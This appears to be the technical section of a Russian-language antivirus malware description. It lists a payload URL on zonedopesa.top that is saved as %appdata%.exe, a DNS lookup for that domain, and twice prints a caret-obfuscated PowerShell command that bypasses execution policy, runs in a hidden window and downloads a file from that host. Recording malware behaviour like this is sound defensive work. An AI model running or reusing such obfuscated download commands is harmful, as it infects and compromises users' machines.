Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWe^rsh^ELl.e^XE -E^xE^c^UTion^PO^li^cY ByPass ^-NOPR^o^f^I^L^E -win^DoWS^TyLE^ ^Hid^DEn^ ^(^New-o^BJect^ sY^stEm.NE^t^.wEb^clIENt)^.DoW^nloA^Df^Ile^('http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "poWe^rsh^ELl.e^XE -E^xE^c^UTion^PO^li^cY ByPass ^-NOPR^o^f^I^L^E -win^DoWS^TyLE^ ^Hid^DEn^ ^(^New-o^BJect^ sY^stEm.NE^t^.wEb^clIENt)^.DoW^nloA^Df^Ile^('http://www.zonedopesa.t...' (со скрытым окном)